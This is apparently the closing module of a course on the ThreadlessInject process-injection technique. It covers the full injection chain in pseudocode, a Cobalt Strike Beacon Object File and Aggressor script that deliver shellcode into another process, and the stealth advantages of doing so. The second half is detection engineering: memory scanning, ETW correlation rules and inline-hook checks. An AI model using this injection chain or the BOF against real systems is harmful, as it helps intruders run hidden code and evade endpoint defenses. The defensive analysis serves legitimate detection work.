Module 8: Full Chain, BOF Integration & Detection
The complete flow from target selection to payload execution, plus how defenders catch it.
Putting It All Together
This final module walks through the entire ThreadlessInject chain end-to-end, demonstrates how it integrates with Cobalt Strike as a Beacon Object File (BOF), and then switches perspective to the defender to examine every detection opportunity across the kill chain. Understanding both sides is essential for building effective offensive tools and for conducting realistic detection engineering.
The Complete Injection Chain
Here is the full sequence of operations that ThreadlessInject performs, from start to finish, with each step numbered in the comments:
ThreadlessInject: End-to-End Flow
```cpp
// ThreadlessInject: Complete implementation pseudocode
bool ThreadlessInject(DWORD pid, const char* dllName, const char* funcName,
                      BYTE* shellcode, SIZE_T shellcodeLen) {
    // Step 1: Open target process
    HANDLE hProc = OpenProcess(
        PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
        FALSE, pid);
    if (!hProc) return false;

    // Step 2: Resolve target function address
    HMODULE hDll = GetModuleHandleA(dllName);
    FARPROC funcAddr = GetProcAddress(hDll, funcName);

    // Step 3: Read original bytes
    BYTE originalBytes[14];
    NtReadVirtualMemory(hProc, funcAddr, originalBytes, 14, NULL);

    // Step 4: Calculate total size and allocate remote memory
    SIZE_T stubSize = CalculateStubSize();
    SIZE_T totalSize = stubSize + shellcodeLen + 14 + 14 + 4; // stub+sc+orig+jmpback+guard
    PVOID remoteMem = NULL;
    NtAllocateVirtualMemory(hProc, &remoteMem, 0, &totalSize,
                            MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    // Step 5: Build complete payload locally
    BYTE* payload = BuildPayload(remoteMem, funcAddr, shellcode,
                                 shellcodeLen, originalBytes);

    // Step 6: Write to remote process
    NtWriteVirtualMemory(hProc, remoteMem, payload, totalSize, NULL);

    // Step 7: Change payload protection to RX
    ULONG oldProt;
    NtProtectVirtualMemory(hProc, &remoteMem, &totalSize,
                           PAGE_EXECUTE_READ, &oldProt);

    // Step 8-10: Install the hook (change prot, write JMP, restore prot)
    BYTE hookJmp[14];
    BuildAbsoluteJmp(hookJmp, (UINT64)remoteMem); // JMP to hook stub
    PVOID funcPage = (PVOID)funcAddr;
    SIZE_T pageSize = 14;
    NtProtectVirtualMemory(hProc, &funcPage, &pageSize,
                           PAGE_EXECUTE_READWRITE, &oldProt);
    NtWriteVirtualMemory(hProc, funcAddr, hookJmp, 14, NULL);
    NtProtectVirtualMemory(hProc, &funcPage, &pageSize,
                           oldProt, &oldProt);

    // Steps 11-12 happen asynchronously in the target process
    printf("[+] Hook installed. Waiting for target thread to trigger...\n");
    // Optionally: monitor guard flag and restore original bytes
    CloseHandle(hProc);
    free(payload);
    return true;
}
```
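The memory manager rounds two of the sizes in this flow, and both shape what defenders later see. NtAllocateVirtualMemory rounds the requested RegionSize up to a whole number of pages. NtProtectVirtualMemory changes the protection of every page that the requested range touches, so the 14-byte `pageSize` in Steps 8-10 really means "the page or pages containing those 14 bytes". The portable sketch below assumes 4 KB pages. The helper names, the example sizes (a 60-byte stub and 460 bytes of shellcode) and the export address used in the usage note are hypothetical.

```cpp
#include <cstdint>

// Assumption: 4 KB pages (the normal, non-large page size on x64 Windows).
constexpr uint64_t kPageSize = 0x1000;

// Round a requested size up to whole pages, as the memory manager does with
// the RegionSize passed to NtAllocateVirtualMemory.
uint64_t RoundUpToPages(uint64_t size) {
    return (size + kPageSize - 1) & ~(kPageSize - 1);
}

// Count the pages covered by [addr, addr + len), with len > 0. This is the
// range whose protection actually changes when NtProtectVirtualMemory is
// called with that base address and size.
uint64_t PagesTouched(uint64_t addr, uint64_t len) {
    uint64_t first = addr & ~(kPageSize - 1);
    uint64_t last = (addr + len - 1) & ~(kPageSize - 1);
    return (last - first) / kPageSize + 1;
}

// Hypothetical example sizes: 60-byte stub + 460-byte shellcode + original
// bytes (14) + jump-back (14) + guard flag (4), matching Step 4.
constexpr uint64_t kExampleRequest = 60 + 460 + 14 + 14 + 4;  // 552 bytes
```

With these example sizes, `RoundUpToPages(552)` is 4096. That is why a payload of a few hundred bytes appears in a memory scanner as a full 4096-byte private region. If an export sits 8 bytes before a page boundary, `PagesTouched(0x7FF8A0001FF8, 14)` is 2, and the hook write makes both code pages writable.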
Cobalt Strike BOF Integration
A Beacon Object File (BOF) is a compiled C object file (COFF, usually with a .o extension) that Cobalt Strike can load and execute directly within the Beacon process. BOFs are popular for post-exploitation because they run in-process (no new process creation) and reuse Beacon's existing communication channel. A BOF implementation of ThreadlessInject was created by iilegacyyii (Jordan Jay) as a community port of CCob's original C# technique, allowing operators to perform threadless injection from a Cobalt Strike Beacon.
BOF Architecture
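BOFs use a special API provided by Cobalt Strike's Beacon runtime. They are not linked against the standard C runtime library, so functions such as printf and malloc are not available directly (they can still be imported through DFR, e.g. MSVCRT$malloc). Instead, BOFs typically use Beacon API functions for output and argument parsing, and Dynamic Function Resolution (DFR) declarations of the form LIBRARY$Function to call Windows APIs: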
```c
// BOF entry point for ThreadlessInject
// Uses Beacon's Dynamic Function Resolution (DFR) for API calls
#include "beacon.h"

// Declare the Windows APIs we need via DFR
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD);
DECLSPEC_IMPORT HMODULE WINAPI KERNEL32$GetModuleHandleA(LPCSTR);
DECLSPEC_IMPORT FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE, LPCSTR);

// NTDLL native APIs
DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtAllocateVirtualMemory(HANDLE, PVOID*, ULONG_PTR, PSIZE_T, ULONG, ULONG);
DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtWriteVirtualMemory(HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T);
DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtProtectVirtualMemory(HANDLE, PVOID*, PSIZE_T, ULONG, PULONG);
DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtReadVirtualMemory(HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T);

void go(char* args, int alen) {
    // Parse arguments from Cobalt Strike
    datap parser;
    BeaconDataParse(&parser, args, alen);
    int pid = BeaconDataInt(&parser);
    char* dllName = BeaconDataExtract(&parser, NULL);
    char* funcName = BeaconDataExtract(&parser, NULL);
    int scLen = 0;
    char* shellcode = BeaconDataExtract(&parser, &scLen);

    BeaconPrintf(CALLBACK_OUTPUT,
        "[*] ThreadlessInject: PID=%d, DLL=%s, Func=%s, SC=%d bytes",
        pid, dllName, funcName, scLen);

    // Execute the threadless injection chain
    // (same logic as standalone, using DFR API calls)
    HANDLE hProc = KERNEL32$OpenProcess(
        PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
        FALSE, pid);
    if (!hProc) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to open process %d", pid);
        return;
    }

    // ... (complete injection chain using NTDLL$ prefixed functions)

    BeaconPrintf(CALLBACK_OUTPUT, "[+] Hook installed successfully");
}
```
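DFR works because of the `LIBRARY$Function` names in the declarations above. The compiler emits each one as an import symbol (on x64, `__imp_KERNEL32$OpenProcess`). Beacon's loader then splits that symbol into a module name and a function name and resolves the pair, for example with LoadLibraryA and GetProcAddress. The portable sketch below shows only the splitting step. `ParseDfrSymbol` is a hypothetical name, and 32-bit symbol decoration (an extra leading underscore and an `@N` suffix) is not handled.

```cpp
#include <optional>
#include <string>
#include <utility>

// Hypothetical helper: split an x64 DFR import symbol such as
// "__imp_KERNEL32$OpenProcess" into {"KERNEL32", "OpenProcess"}.
// Returns std::nullopt if the symbol does not follow the MODULE$Function form.
std::optional<std::pair<std::string, std::string>>
ParseDfrSymbol(const std::string& symbol) {
    const std::string prefix = "__imp_";
    if (symbol.compare(0, prefix.size(), prefix) != 0) return std::nullopt;

    std::string rest = symbol.substr(prefix.size());
    size_t dollar = rest.find('$');
    // Require a non-empty module name and a non-empty function name.
    if (dollar == std::string::npos || dollar == 0 || dollar + 1 == rest.size())
        return std::nullopt;

    return std::make_pair(rest.substr(0, dollar), rest.substr(dollar + 1));
}
```

Symbols without a `$`, such as `__imp_BeaconPrintf`, return `std::nullopt` here. A loader resolves those against its built-in Beacon API functions rather than a Windows DLL.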
Aggressor Script Integration
The BOF is loaded into Cobalt Strike via an Aggressor script that defines a new command for the operator:
```
# ThreadlessInject Aggressor script
# Registers the 'threadlessinject' command in Cobalt Strike
alias threadlessinject {
    local('$pid $dll $func $shellcode $bof');
    $pid = $2;   # Target PID
    $dll = $3;   # DLL containing target function
    $func = $4;  # Export function name to hook

    # Generate shellcode for the target architecture
    $shellcode = shellcode($1, false, "x64");

    # Read the compiled BOF
    $bof = readbof("ThreadlessInject.o");

    # Pack arguments and execute the BOF
    btask($1, "Threadless Inject into PID $pid via $dll!$func");
    beacon_inline_execute($1, $bof, "go",
        bof_pack($1, "izzb", $pid, $dll, $func, $shellcode));
}

# Usage from Cobalt Strike console:
# threadlessinject 1234 ntdll.dll NtWaitForSingleObject
```
BOF Advantages
Running ThreadlessInject as a BOF has significant operational advantages. The BOF runs inside the existing Beacon process, so there is no new process creation (which would trigger PsSetCreateProcessNotifyRoutine callbacks). The BOF uses Beacon's in-memory execution, so there is no file written to disk. And because the BOF communicates results back through Beacon's existing C2 channel, there is no new network connection to create or monitor.
Detection Vectors
Now we switch to the defender's perspective. While ThreadlessInject avoids thread creation telemetry, it is not invisible. Here are the detection opportunities at each stage of the kill chain:
| Stage | Detection Method | Telemetry Source | Detection Difficulty |
|---|---|---|---|
| OpenProcess | Cross-process handle with VM rights | ObRegisterCallbacks (kernel), e.g. Sysmon Event ID 10 (ProcessAccess) | Medium |
| NtAllocateVirtualMemory | Remote allocation of private memory | ETW: Microsoft-Windows-Threat-Intelligence (remote allocation events) | Medium |
| NtWriteVirtualMemory | Cross-process memory write | ETW: Microsoft-Windows-Threat-Intelligence (remote write events) | Medium |
| NtProtectVirtualMemory | RW→RX transition on private memory | ETW: Microsoft-Windows-Threat-Intelligence (remote protect events) | High (many false positives) |
| Prologue overwrite | Modified DLL code page (private copy-on-write page) | Memory scanning, page hash comparison | High |
| Hook stub in memory | RX private memory with no backing image | Memory scanning (Moneta, pe-sieve) | Medium |
| Modified function entry | Inline hook detection on known exports | Hook scanning (HookShark, etc.) | Medium |
Memory Scanning Detection
Memory scanners like Moneta and pe-sieve are among the most effective detection tools against ThreadlessInject. They detect two key artifacts:
1. Unbacked Executable Memory
ThreadlessInject allocates private memory (not backed by a DLL file) and marks it as executable. Memory scanners enumerate all memory regions and flag any that are executable but not backed by a known image file on disk. This is the hook stub + shellcode region.
```cpp
// What Moneta flags (illustrative summary, not its literal output format):
// Region at 0x00000213A0010000:
//   Type:       MEM_PRIVATE (not backed by a file)
//   Protection: PAGE_EXECUTE_READ
//   Size:       4096 bytes (the allocation is rounded up to a whole page)
//   Backing:    NONE (no image file)
//   VERDICT:    Suspicious - private executable memory without backing image
// Defender query using Moneta:
//   moneta64.exe -p <target_pid>
// The output includes every private executable region with no backing DLL/EXE
```
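A scanner's core test for this artifact is easy to state. It walks the address space (on Windows, with VirtualQueryEx) and flags committed regions whose protection includes execute rights but whose type is not MEM_IMAGE. The portable sketch below applies that test to a list of region records that have already been collected. `Region` and `FindNonImageExecutable` are hypothetical names. The constants carry the numeric values of the corresponding winnt.h definitions and are redefined here so the code compiles on any platform.

```cpp
#include <cstdint>
#include <vector>

// Numeric values of the relevant winnt.h constants.
constexpr uint32_t kMemCommit  = 0x1000;     // MEM_COMMIT
constexpr uint32_t kMemPrivate = 0x20000;    // MEM_PRIVATE
constexpr uint32_t kMemMapped  = 0x40000;    // MEM_MAPPED
constexpr uint32_t kMemImage   = 0x1000000;  // MEM_IMAGE
// PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
constexpr uint32_t kExecMask = 0x10 | 0x20 | 0x40 | 0x80;

// Simplified stand-in for one MEMORY_BASIC_INFORMATION record.
struct Region {
    uint64_t base;
    uint64_t size;
    uint32_t state;    // MEM_COMMIT, MEM_RESERVE or MEM_FREE
    uint32_t type;     // MEM_PRIVATE, MEM_MAPPED or MEM_IMAGE
    uint32_t protect;  // PAGE_* value (modifier bits such as PAGE_GUARD are ignored)
};

// Return committed, executable regions that are not image-backed.
std::vector<Region> FindNonImageExecutable(const std::vector<Region>& regions) {
    std::vector<Region> hits;
    for (const Region& r : regions) {
        bool executable = (r.protect & kExecMask) != 0;
        bool nonImage = r.type == kMemPrivate || r.type == kMemMapped;
        if (r.state == kMemCommit && executable && nonImage) hits.push_back(r);
    }
    return hits;
}
```

On its own this test also fires on legitimate JIT output (for example .NET or JavaScript engines), which is why tools typically combine it with other indicators before reporting.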
2. Modified Code Pages (Copy-on-Write)
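When ThreadlessInject overwrites the target function's prologue, it triggers a copy-on-write (COW) fault. DLL code pages are normally shared by every process that loads the DLL (they map the same physical memory). The injector first makes the page writable, and the first write then makes Windows give the target process its own private copy of that page, leaving other processes untouched. This leaves two detectable traces. First, the bytes in the private copy differ from the on-disk DLL, which pe-sieve finds by comparing each loaded module with its file. Second, the page is no longer shared, which Moneta reports as modified code by checking the working-set attributes of image pages. Either difference indicates code modification (i.e., a hook).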
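A pe-sieve-style byte comparison can be sketched as a diff over one code section. This is a simplified, portable illustration with a hypothetical function name (`FindModifiedRuns`). It assumes the on-disk bytes have already been mapped and relocated to the module's load address. A real scanner must do that first so that relocated pointers do not show up as false differences.

```cpp
#include <cstddef>
#include <cstdint>
#include <utility>
#include <vector>

// Compare a section's in-memory bytes with the same section from the
// (already relocated) on-disk image and return each modified run as
// {offset, length}.
std::vector<std::pair<size_t, size_t>>
FindModifiedRuns(const std::vector<uint8_t>& onDisk,
                 const std::vector<uint8_t>& inMemory) {
    std::vector<std::pair<size_t, size_t>> runs;
    size_t n = onDisk.size() < inMemory.size() ? onDisk.size() : inMemory.size();
    size_t i = 0;
    while (i < n) {
        if (onDisk[i] == inMemory[i]) { ++i; continue; }
        size_t start = i;
        while (i < n && onDisk[i] != inMemory[i]) ++i;  // extend the differing run
        runs.emplace_back(start, i - start);
    }
    return runs;
}
```

A prologue overwrite typically shows up as one short run at the export's offset. A hook byte that happens to equal the original byte splits the run, so a real scanner would merge runs separated by a few identical bytes.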
pe-sieve Detection
Running pe-sieve against the target process after ThreadlessInject is installed reports the target DLL as hooked (counted under "Hooked" in pe-sieve's scan summary). The tool compares the in-memory code of every loaded module against the on-disk file and reports any discrepancies, so the 14-byte modification at the target function's entry point is flagged immediately. Once the hook is cleaned up (original bytes restored), the byte comparison comes back clean. The private COW copy of the page typically remains, though, so a working-set check can still reveal that the page was written.
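The two signals (a byte difference against disk, and a code page that is no longer shared) can disagree, and their combination separates a live hook from one that has been removed. The sketch below is a hypothetical classification, and the enum and function names are illustrative. On Windows, `pageShared` would come from QueryWorkingSetEx, whose PSAPI_WORKING_SET_EX_BLOCK reports a Shared bit. Check its Valid bit first, because the attributes are only meaningful for pages currently in the working set. `bytesMatchDisk` would come from a byte comparison like pe-sieve's.

```cpp
// Hypothetical classification of one code page of a loaded DLL from two
// independent signals:
//   bytesMatchDisk - bytes equal the relocated on-disk image
//   pageShared     - page is still shared (working-set Shared bit)
enum class CodePageState { Clean, Hooked, RestoredAfterWrite };

CodePageState ClassifyCodePage(bool bytesMatchDisk, bool pageShared) {
    if (!bytesMatchDisk) return CodePageState::Hooked;          // modification still present
    if (!pageShared) return CodePageState::RestoredAfterWrite;  // private COW copy left behind
    return CodePageState::Clean;
}
```

Legitimate EDR hooks also produce private, modified pages, so in practice this classification is combined with where any jump actually lands.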
ETW-Based Detection
Event Tracing for Windows provides several relevant providers for detecting ThreadlessInject's operations:
```cpp
// Key telemetry sources for detection:
// 1. Microsoft-Windows-Kernel-Process
//    Events: ProcessStart, ThreadStart
//    ThreadlessInject avoidance: No ThreadStart event (no new thread!)
//    Note: handle opens are not logged by this provider; cross-process
//    OpenProcess calls are visible to ObRegisterCallbacks-based sensors
//    instead (e.g., Sysmon Event ID 10, ProcessAccess)
// 2. NT Kernel Logger with EVENT_TRACE_FLAG_VIRTUAL_ALLOC
//    Events: VirtualAlloc / VirtualFree (base address, size, process ID)
//    Limitation: protection changes and memory writes are not covered
// 3. Microsoft-Windows-Threat-Intelligence (TI provider)
//    Consumer must run as an Antimalware Protected Process Light (PPL),
//    which in practice means an EDR with an ELAM-registered signer
//    Events: cross-process allocate, write and protect operations
//    (e.g., ALLOCVM_REMOTE, WRITEVM_REMOTE, PROTECTVM_REMOTE)
//    The most comprehensive source, but unavailable to ordinary user-mode tools
//    Pattern: NtAllocateVirtualMemory(remoteHandle, ..., PAGE_READWRITE)
//             followed by NtProtectVirtualMemory(..., PAGE_EXECUTE_READ)
// Detection rule pseudocode:
// IF process_A calls NtAllocateVirtualMemory on process_B
// AND process_A calls NtWriteVirtualMemory on process_B
// AND process_A calls NtProtectVirtualMemory on process_B (RW->RX)
// AND process_A writes into image-backed (MEM_IMAGE) code in process_B
// AND NO NtCreateThreadEx or CreateRemoteThread follows
// THEN: Possible threadless injection (strong signal; tune out debuggers,
//       JIT hosts and security tools that legitimately write cross-process)
```
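The correlation rule above can be expressed as a small pass over normalized events. This sketch rests on simplifying assumptions. The `Event` fields and function names are hypothetical, and a real sensor would derive them from Threat-Intelligence ETW events or kernel callbacks. Event ordering within the window is ignored. "RW→RX" is simplified to "protection changed to any executable value". The sketch also requires a cross-process write into image-backed memory, which corresponds to the prologue overwrite in Steps 8-10 and is what separates this pattern from ordinary remote allocation.

```cpp
#include <cstdint>
#include <map>
#include <set>
#include <utility>
#include <vector>

// Hypothetical normalized cross-process event (not an ETW schema).
enum class Op { Alloc, Write, Protect, CreateThread };

struct Event {
    uint32_t sourcePid;
    uint32_t targetPid;
    Op op;
    uint32_t newProtect;  // PAGE_* value for Protect events, else 0
    bool targetIsImage;   // Write/Protect landed in MEM_IMAGE memory
};

struct PairState {
    bool alloc = false, write = false, protectToExec = false;
    bool imageWrite = false, thread = false;
};

// Return {source, target} pairs that, within one correlation window,
// allocated, wrote and made executable private memory, wrote into image
// code, and never created a remote thread.
std::set<std::pair<uint32_t, uint32_t>>
FindThreadlessCandidates(const std::vector<Event>& window) {
    constexpr uint32_t kExecMask = 0x10 | 0x20 | 0x40 | 0x80;  // PAGE_EXECUTE*
    std::map<std::pair<uint32_t, uint32_t>, PairState> state;
    for (const Event& e : window) {
        if (e.sourcePid == e.targetPid) continue;  // cross-process activity only
        PairState& s = state[{e.sourcePid, e.targetPid}];
        switch (e.op) {
            case Op::Alloc: s.alloc = true; break;
            case Op::Write:
                if (e.targetIsImage) s.imageWrite = true; else s.write = true;
                break;
            case Op::Protect:
                if (!e.targetIsImage && (e.newProtect & kExecMask)) s.protectToExec = true;
                break;
            case Op::CreateThread: s.thread = true; break;
        }
    }
    std::set<std::pair<uint32_t, uint32_t>> hits;
    for (const auto& [key, s] : state)
        if (s.alloc && s.write && s.protectToExec && s.imageWrite && !s.thread)
            hits.insert(key);
    return hits;
}
```

The second pair in the test below performs the same memory operations but then creates a thread, so it is left to classic remote-thread detections rather than reported as threadless.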
Inline Hook Detection
Dedicated hook detection tools scan all loaded DLLs for inline hooks by examining the first bytes of exported functions. A JMP instruction at the very beginning of a function (especially to private memory) is a strong indicator of an inline hook:
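```cpp
#include <windows.h>
#include <cstdio>
#include <cstring>

// True if addr lies in committed memory that is not backed by an image file
// (MEM_PRIVATE or MEM_MAPPED), i.e. a likely hook stub.
static bool IsNonImageMemory(UINT64 addr) {
    MEMORY_BASIC_INFORMATION mbi = {};
    if (VirtualQuery((LPCVOID)addr, &mbi, sizeof(mbi)) == 0) return false;
    return mbi.State == MEM_COMMIT && mbi.Type != MEM_IMAGE;
}

// Simple inline hook detection: check the first bytes of an exported
// function in the current process
bool DetectInlineHook(HMODULE hModule, const char* funcName) {
    FARPROC funcAddr = GetProcAddress(hModule, funcName);
    if (!funcAddr) return false;
    const BYTE* bytes = (const BYTE*)funcAddr;
    UINT64 target = 0;

    if (bytes[0] == 0xFF && bytes[1] == 0x25) {
        // JMP [RIP+disp32]: FF 25 00 00 00 00 means the 8-byte target follows inline
        INT32 disp;
        memcpy(&disp, bytes + 2, sizeof(disp));
        if (disp == 0) memcpy(&target, bytes + 6, sizeof(target));
    } else if (bytes[0] == 0xE9 || bytes[0] == 0xE8) {
        // Relative JMP (E9) or CALL (E8) rel32: target = next instruction + rel32
        INT32 rel;
        memcpy(&rel, bytes + 1, sizeof(rel));
        target = (UINT64)funcAddr + 5 + (INT64)rel;
    }

    // A jump from an export into non-image memory is the strong indicator
    if (target && IsNonImageMemory(target)) {
        printf("[!] HOOK DETECTED: %s -> 0x%llx (non-image memory)\n",
               funcName, (unsigned long long)target);
        return true;
    }
    return false;
}
```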
Detection Engineering Summary
Detection Coverage Map
Key Takeaway for Defenders
ThreadlessInject eliminates the thread creation signal, which was the easiest and most reliable detection for traditional injection. However, it cannot eliminate the need for cross-process memory operations (allocate, write, protect) or the resulting memory artifacts (unbacked executable memory, modified code pages). Detection strategies should focus on (1) memory scanning for private executable regions, (2) ETW monitoring for cross-process VirtualProtect patterns (especially RW→RX), and (3) periodic inline hook verification on critical system DLL exports.
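Periodic inline hook verification, the third strategy above, can be as simple as hashing the first bytes of each monitored export and comparing the result against a baseline. The sketch uses 64-bit FNV-1a only as a convenient non-cryptographic hash. `HashPrologue` and `ChangedExports` are hypothetical names. The baseline should be computed from the relocated on-disk image rather than from memory at startup, because by the time the check first runs the process may already contain hooks, including legitimate EDR hooks.

```cpp
#include <cstddef>
#include <cstdint>
#include <map>
#include <string>
#include <vector>

// 64-bit FNV-1a over a function's first len bytes.
uint64_t HashPrologue(const uint8_t* bytes, size_t len) {
    uint64_t h = 0xcbf29ce484222325ULL;  // FNV offset basis
    for (size_t i = 0; i < len; ++i) {
        h ^= bytes[i];
        h *= 0x100000001b3ULL;           // FNV prime
    }
    return h;
}

// Report exports whose current prologue hash differs from the baseline.
std::vector<std::string> ChangedExports(
        const std::map<std::string, uint64_t>& baseline,
        const std::map<std::string, uint64_t>& current) {
    std::vector<std::string> changed;
    for (const auto& [name, hash] : baseline) {
        auto it = current.find(name);
        if (it != current.end() && it->second != hash) changed.push_back(name);
    }
    return changed;
}
```

Running this on a timer over critical ntdll and kernel32 exports catches a hook while it is installed. It misses one that was installed and removed between checks, which is where the working-set signal helps.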
Related Techniques
ThreadlessInject is part of a family of advanced injection techniques that avoid classic injection signals. PoolParty by SafeBreach abuses the target's Windows thread pool (for example by queuing work items) so that existing worker threads run the payload. Mockingjay by Security Joes writes into pre-existing RWX sections of certain DLLs, avoiding memory allocation and protection changes entirely. Understanding ThreadlessInject provides the foundation for understanding these related techniques, as they all share the same goal: triggering code execution without the detectable act of creating a new remote thread or the other telltale steps of traditional injection.
Course Complete
You have completed the ThreadlessInject Masterclass. You now understand how threadless injection works at every level: from the detection problems with traditional injection, through the mechanics of remote function hooking, to the byte-level construction of hook stubs and the detection engineering perspective. Apply this knowledge responsibly.
Pop Quiz: Full Chain & Detection
Q1: Which detection method is MOST effective against ThreadlessInject?
Q2: What is the primary advantage of running ThreadlessInject as a Cobalt Strike BOF?
Q3: What causes a copy-on-write (COW) fault that pe-sieve can detect?